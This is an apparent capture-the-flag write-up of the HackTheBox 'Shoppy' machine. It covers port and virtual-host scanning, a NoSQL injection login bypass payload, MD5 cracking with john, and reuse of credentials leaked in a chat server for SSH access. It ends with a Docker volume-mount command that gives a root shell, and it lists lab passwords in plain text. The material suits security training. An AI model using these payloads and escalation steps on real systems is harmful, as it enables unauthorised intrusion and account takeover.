banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

htb Range-Shoppy

ip: 10.10.11.180

Information Gathering#

Open Ports#

Use nmap for port scanning

nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.180

Discovered ports: 22, 80, 9093

image

Port 80 redirects to http://shoppy.htb

Modify the hosts file and add the resolution

image

Access http://shoppy.htb/, the homepage is as follows:

image

Domain Situation#

Since there is a domain, let's see what can be found with virtual host scanning.

gobuster vhost -u shoppy.htb -w /Users/grayash/pentesting/web-basic/p12-字典收集/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 50

image

Found a virtual host subdomain

mattermost.shoppy.htb

Add mattermost.shoppy.htb to the hosts file for resolution.

After accessing it in the browser, the interface is as follows:

image

Use ffuf to perform sensitive directory and file traversal on shoppy.htb.

.\ffuf.exe -w .\fuzz1.txt -u http://shoppy.htb/FUZZ

image

Tested briefly, this login box has no POST link.

When entering admin' or '1'='1, the program does not respond. Entering admin' || '1=1 can bypass the backend login. This statement is a NoSQL injection statement, so this is a [[NoSQL injection]] login bypass.

image

Enter the same payload in the search box: admin' || '1=1

image

View the JSON file, the content is as follows, including the account password, which is encrypted with MD5.

image

Use [[john]] to crack the hash

john --wordlist=rockyou.txt --format=Raw-MD5 passwd.txt

image

remembermethisway

Use the cracked password to log in to mattermost.shoppy.htb

Account password:

josh:remembermethisway

The mattermost.shoppy.htb website is a chat program, and many channels have been established in the background. An account password was found in one of the channels, which should be the password for the 10.10.11.180 server. Try to log in via SSH.

image

username: jaeger
password: Sh0ppyBest@pp!

Found the first flag, user.txt.

By using sudo -l, you can see the programs that the current user can run as root.

image

/home/deploy/password-manager

image

Welcome to Josh password manager!Please enter your master password: SampleAccess granted! Here is creds !cat /home/deploy/creds.txtAccess denied! This incident will be reported !

SampleAccess granted! So Sample is the master password, and this program can be used to see the master password.

Found the password for deploy.

image

username: deploy
password: Deploying@pp!

In the same way, log in to the deploy account via SSH.

image

Privilege Escalation#

From the chat records in the channel, it can be seen that the server is deployed using Docker.

image

Use the payload for Docker privilege escalation found on https://gtfobins.github.io/gtfobins/docker/. With Docker, an interactive shell can be obtained.

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

After running it, it is a root shell.

image

Get the flag in the /root directory.

Knowledge Points#

  • Information gathering skills
  • Virtual host, MD5 password cracking skills
  • Privilege escalation skills

References#

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.